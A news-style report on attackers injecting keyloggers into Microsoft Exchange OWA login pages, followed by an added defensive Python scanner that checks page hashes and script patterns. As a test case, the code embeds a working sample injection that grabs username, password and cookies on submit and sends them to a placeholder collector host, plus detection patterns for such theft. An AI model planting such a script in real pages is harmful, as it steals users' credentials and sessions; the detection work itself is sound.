Hackers Hijacking Microsoft Exchange Login Pages to Steal Credentials
A sophisticated cyberattack campaign is targeting Microsoft Exchange servers by quietly injecting malicious code into their login pages. By modifying the Outlook Web Access (OWA) interface, attackers can secretly log every keystroke users enter—including usernames and passwords—as they attempt to sign in.
This method doesn’t rely on phishing emails or look-alike domains. Because the tampered page is the organization’s real login page, served from its own hostname with its own certificate, users see nothing unusual and have almost no way to tell that anything is wrong. The attackers have crafted two versions of their keylogger script. One writes the stolen credentials to a hidden file on the server for later retrieval, while the other transmits them immediately to an external destination for real-time harvesting.
So far, dozens of Exchange servers have been compromised across a wide range of countries. The scope is global, impacting organizations in sectors such as government, banking, IT, education, logistics, and industrial services. Initial activity appears to have focused on regions in the Middle East and Africa before expanding to a much broader range of targets.
The hackers are exploiting long-known vulnerabilities in Microsoft Exchange, including flaws that were first disclosed several years ago. These weaknesses give attackers administrative access to the server, and with it the ability to edit the OWA login page on disk and embed their data-capturing script without disrupting the normal sign-in flow.
What makes this campaign particularly dangerous is how quietly it operates. In the variant that stores stolen data locally, the script generates no outbound traffic at all, so network-based monitoring has nothing to catch; the only evidence is a modified page and an extra file on the server itself. In the exfiltrating variant, the data leaves in requests that look like ordinary web traffic and are hard to distinguish from legitimate activity.
In addition to usernames and passwords, the scripts also gather session cookies, browser information, and timestamps. Cookies and browser details help attackers reproduce the victim’s session and client profile, so that later logins with the stolen credentials look like the real user rather than an intruder.
This campaign is a wake-up call for organizations still relying on outdated or unpatched Exchange servers. Despite the availability of fixes for many of the exploited vulnerabilities, too many systems remain exposed. The use of such stealthy and effective techniques to steal login credentials highlights the importance of proactive security practices.
Organizations should take immediate steps to ensure their Exchange servers are fully patched, limit unnecessary internet exposure of OWA, and check for tampering directly: compare the login page files on disk against known-good copies, look for unexpected files in the OWA directories, and review authentication logs for sign-ins from unfamiliar locations or devices. In today’s threat landscape, even trusted systems can become traps if they’re not actively maintained and monitored.
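The following is an added example of the kind of tampering check described above; it is not code from the article or from the researchers who reported the campaign. It hashes a login page against a known-good baseline and scans its inline scripts for the combination of a form or keystroke hook, credential-field or cookie access, and an exfiltration primitive. The sample pages, the form element ids, the collector hostname and the pattern list are all constructed assumptions for illustration; real OWA markup and a real injected script will differ.

```python
import hashlib
import os
import re
from html.parser import HTMLParser

# Heuristic markers of a form-scraping script injected into a logon page.
# These are assumptions for this example, not signatures from the campaign.
SUSPICIOUS_PATTERNS = {
    "form_or_key_hook": r"addEventListener\(\s*['\"](keydown|keyup|keypress|submit)['\"]|\.onsubmit\s*=",
    "credential_fields": r"getElementById\(\s*['\"](username|password)['\"]",
    "cookie_read": r"document\.cookie",
    "exfil_call": r"XMLHttpRequest|fetch\(|navigator\.sendBeacon|new\s+Image\(",
}


class ScriptExtractor(HTMLParser):
    """Collect inline <script> bodies and external script src values."""

    def __init__(self):
        super().__init__()
        self.inline = []
        self.external = []
        self._in_inline = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_inline = True
            self._buf = []

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_inline:
            self._in_inline = False
            self.inline.append("".join(self._buf))

    def handle_data(self, data):
        if self._in_inline:
            self._buf.append(data)


def sha256_text(text):
    return hashlib.sha256(text.encode("utf-8")).hexdigest()


def scan_page(html, allowed_script_hosts=()):
    """Return findings for one logon page: suspicious inline scripts and untrusted external scripts."""
    parser = ScriptExtractor()
    parser.feed(html)
    findings = []
    for idx, body in enumerate(parser.inline):
        hits = [name for name, pat in SUSPICIOUS_PATTERNS.items() if re.search(pat, body)]
        # A lone submit handler is normal; require a hook plus credential, cookie
        # or exfiltration behaviour before flagging, to keep noise down.
        if "form_or_key_hook" in hits and len(hits) >= 2:
            findings.append(("inline_script", idx, hits))
    for src in parser.external:
        m = re.match(r"^(?:https?:)?//([^/]+)", src)
        if m and m.group(1).lower() not in allowed_script_hosts:
            findings.append(("external_script", src, ["untrusted_host"]))
    return findings


def check_file(path, baseline_sha256, allowed_script_hosts=()):
    """Compare one page file against its known-good hash and scan its scripts."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        html = fh.read()
    return {"hash_matches": sha256_text(html) == baseline_sha256,
            "findings": scan_page(html, allowed_script_hosts)}


def scan_directory(root, baselines, allowed_script_hosts=()):
    """Walk an OWA auth directory and check every .aspx page; baselines maps path -> sha256."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".aspx"):
                path = os.path.join(dirpath, name)
                report[path] = check_file(path, baselines.get(path, ""), allowed_script_hosts)
    return report


# Constructed sample pages (not real OWA markup); the element ids are assumptions.
CLEAN_PAGE = """<html><body>
<form id="logonForm" action="/owa/auth.owa" method="post">
<input id="username" name="username"><input id="password" name="password" type="password">
</form><script src="/owa/auth/logon.js"></script></body></html>"""

# The same page with a constructed exfiltrating injection appended before </body>.
TAMPERED_PAGE = CLEAN_PAGE.replace("</body>", """<script>
document.getElementById("logonForm").addEventListener("submit", function () {
  var u = document.getElementById("username").value;
  var p = document.getElementById("password").value;
  new Image().src = "https://collector.invalid/c?d=" + btoa(u + ":" + p + ":" + document.cookie);
});
</script></body>""")

BASELINE = sha256_text(CLEAN_PAGE)  # record baselines while the server is known-good

if __name__ == "__main__":
    # On a real server the pages live under the Exchange install path, e.g.
    # %ExchangeInstallPath%\FrontEnd\HttpProxy\owa\auth (default layout; verify locally).
    print("clean:", scan_page(CLEAN_PAGE))
    print("tampered:", scan_page(TAMPERED_PAGE), "hash ok:", sha256_text(TAMPERED_PAGE) == BASELINE)
```

The hash comparison is the stronger of the two checks and is the one that also catches the local-storage variant, which produces no traffic to alert on; the script scan is a fallback for pages whose baseline was never recorded. Run it from a clean host against copies of the files rather than on the suspect server alone, since an attacker with administrative access can alter what that server reports.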